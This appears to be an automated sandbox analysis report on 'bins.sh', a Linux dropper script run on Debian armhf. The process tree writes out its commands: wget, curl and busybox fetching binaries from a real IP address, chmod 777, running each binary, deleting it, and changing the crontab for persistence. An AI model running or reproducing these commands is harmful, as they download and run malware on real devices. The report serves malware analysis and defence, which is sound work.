Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 10:17
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
782fad2003d7212f3365eba40d6e6f9b
-
SHA1
8d89fb07236bddaa91ccd1787427a115576d0f3b
-
SHA256
4c23b7f175bcf21ff03b72a53f53a2d88d62cefa2c5ec0b74dd941d32183a69d
-
SHA512
987fe627b321243f135aa61cd6b131d1049e2c35c1662fbade1459ba3d19e5a4c460d1af5b9ecb348c1c0ee653a48cdcb3b65fdc5ae2abbf06eab66d65810c2a
-
SSDEEP
192:BzrjeSOvHJiSiswV1gyz2BgV1R5QQQRiuYr1R5QQciuYGbyHBiSiswVJzrjeSOV:AxiSiJV1g4qgcRiuYmiuYGoiSiJVO
Malware Config
Signatures
-
Contacts a large (1544) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid process 713 chmod 737 chmod 771 chmod 778 chmod 677 chmod -
Executes dropped EXE 5 IoCs
Processes:
XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioRI0lFteEawbJ2WBcXsletRRgRlmO7jvdj72pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFITuxJtSitYVuoAPgEyiedRmOBWubKTGByXdZlXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApTioc pid process /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR 679 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR /tmp/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72 715 I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72 /tmp/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT 738 pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT /tmp/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ 772 uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ /tmp/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT 779 lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT -
Renames itself 1 IoCs
Processes:
lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApTpid process 780 lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.nptav2 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApTcurlcrontabdescription ioc process File opened for reading /proc/849/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/893/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/26/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/112/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/802/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/889/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/145/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/218/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/836/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/795/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/888/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/921/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/12/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/269/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/301/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/837/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/859/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/865/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/956/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/271/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/793/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/810/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/153/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/976/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/self/auxv curl File opened for reading /proc/filesystems crontab File opened for reading /proc/8/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/17/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/845/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/16/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/843/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/860/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/884/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/2/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/640/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/830/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/965/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/970/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/15/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/842/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/870/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/862/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/872/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/901/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/797/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/813/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/855/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/930/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/967/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/639/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/873/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/891/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/169/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/923/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/13/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/916/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/917/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/944/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/966/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/81/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/641/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/800/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/10/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT File opened for reading /proc/794/cmdline lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetbusyboxcurlcurlbusyboxcurlwgetcurlwgetwgetbusyboxbusyboxwgetbusyboxcurldescription ioc process File opened for modification /tmp/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT wget File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR busybox File opened for modification /tmp/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72 curl File opened for modification /tmp/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT curl File opened for modification /tmp/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT busybox File opened for modification /tmp/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ curl File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR wget File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR curl File opened for modification /tmp/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72 wget File opened for modification /tmp/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT wget File opened for modification /tmp/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT busybox File opened for modification /tmp/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72 busybox File opened for modification /tmp/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ wget File opened for modification /tmp/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ busybox File opened for modification /tmp/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:642
-
/bin/rm/bin/rm bins.sh2⤵PID:644
-
/usr/bin/wgetwget http://216.126.231.240/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Writes file to tmp directory
PID:646 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:669 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Writes file to tmp directory
PID:674 -
/bin/chmodchmod 777 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- File and Directory Permissions Modification
PID:677 -
/tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR./XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵
- Executes dropped EXE
PID:679 -
/bin/rmrm XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR2⤵PID:682
-
/usr/bin/wgetwget http://216.126.231.240/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵
- Writes file to tmp directory
PID:683 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵
- Writes file to tmp directory
PID:708 -
/bin/chmodchmod 777 I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵
- File and Directory Permissions Modification
PID:713 -
/tmp/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72./I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵
- Executes dropped EXE
PID:715 -
/bin/rmrm I0lFteEawbJ2WBcXsletRRgRlmO7jvdj722⤵PID:717
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵
- Writes file to tmp directory
PID:718 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:731 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵
- Writes file to tmp directory
PID:733 -
/bin/chmodchmod 777 pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵
- File and Directory Permissions Modification
PID:737 -
/tmp/pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT./pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵
- Executes dropped EXE
PID:738 -
/bin/rmrm pdEXBunZfxLpGhH7P9oIV8xz96LOkwVFIT2⤵PID:741
-
/usr/bin/wgetwget http://216.126.231.240/bins/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵
- Writes file to tmp directory
PID:742 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:754 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵
- Writes file to tmp directory
PID:769 -
/bin/chmodchmod 777 uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵
- File and Directory Permissions Modification
PID:771 -
/tmp/uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ./uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵
- Executes dropped EXE
PID:772 -
/bin/rmrm uxJtSitYVuoAPgEyiedRmOBWubKTGByXdZ2⤵PID:774
-
/usr/bin/wgetwget http://216.126.231.240/bins/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵
- Writes file to tmp directory
PID:775 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:776 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵
- Writes file to tmp directory
PID:777 -
/bin/chmodchmod 777 lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵
- File and Directory Permissions Modification
PID:778 -
/tmp/lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT./lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:779 -
/bin/shsh -c "crontab -l"3⤵PID:781
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:782 -
/bin/shsh -c "crontab -"3⤵PID:783
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:784 -
/bin/rmrm lXAums4ceaHEmYsmj0Y5UgjLd6aCOD6ApT2⤵PID:786
-
/usr/bin/wgetwget http://216.126.231.240/bins/zrLKoVVorIBLMlwRqIhts0uD4axUtXucWz2⤵PID:789
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5fed7d2f86e498b60a8e71847f3ebcef2
SHA138a9ebbb33322fdd3dcb58ea4909d117163077ad
SHA25621d7ae19a8d9224c4d93313f0b6cea346c51526baae641ef38eadb60738d9f0c
SHA51261f10e2684da0594a24110b79411bac67d1d0d5aaf77968f7cb34e39fa1010c5c291aec3fd12ded0d0cfeae0f68e820bdba6f35305c54c62827fd51043470949